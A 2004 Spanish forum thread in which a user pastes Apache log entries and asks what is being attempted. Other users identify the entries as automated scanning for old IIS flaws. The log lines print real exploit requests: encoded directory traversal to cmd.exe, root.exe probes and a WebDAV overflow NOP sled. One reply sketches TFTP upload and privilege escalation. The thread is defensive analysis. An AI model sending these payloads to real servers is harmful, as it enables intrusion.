Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

hosting en interdominios
118 lecturas y 7 respuestas
  • Cerrado

    Que me estan intentando hacer?

    Esto es lo que me he encontrado al mirar el log de mi apache:

    62.57.23.143 - - [12/Jun/2004:16:51:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
    62.57.23.143 - - [12/Jun/2004:16:51:20 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
    62.57.69.150 - - [12/Jun/2004:18:13:00 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\

    ...

    x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 337 "-" "-"
    62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
    62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
    62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
    62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
    62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
    62.57.23.143 - - [12/Jun/2004:21:25:40 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"

    Lo unico que se es que esa ip es de la misma red que la mia (Menta).

    Gracias

    Este tema es antiguo y puede contener información obsoleta. Abre un nuevo tema para publicar tu mensaje.
    • Cerrado

      Pos eso, alguien quiere ver si puede sacarte una consola :)…

      Pos eso, alguien quiere ver si puede sacarte una consola :)
      Aunque no creo que lo intente de nuevo, pues no ha obtenido resultados satisfactorios (404); usas Apache así que no creo que tengas muchos problemas.
      Salu2

    • Cerrado

      pega las lineas del log en google. por ejemplo esta: GET…

      pega las lineas del log en google.
      por ejemplo esta:
      GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"

      encontraras mucha informacion.

    • Cerrado

      Debe ser que alguien está utilizando algun escáner contra tu…

      Debe ser que alguien está utilizando algun escáner contra tu servidor tipo Nessus, Languard...etc

      Aunque creo que el nessus detecta el tipo de servidor y determina que plugins deben ser lanzados contra tu servidor, asi que debe de ser algún escáner un poco malo.

      Saludos

    • Cerrado

      es un escaner sin duda no tubo ningun exito.. normalmente…

      es un escaner sin duda no tubo ningun exito.. normalmente este tipo de vulneabilidades eran mas amplicas en la epoca de la vulneabilidad Unicode decode, en la ke se baso si no me equivoco o no recuerdo mal el famoso virus cojonero Redcode simplemente con dicha vulneabilidad conseguian mas o menos una consola podian listar.. copiar pegar.. y usar tecnicas de trasferencia del tipo TFTP que es un tipo de trasferencia de archivos con la que trabajan la mayoria de rooters por cierto, y utilizandola subias un archivo ke podia ser un virus y te las ingeniavas para elevear privilegios y tomar una consola admin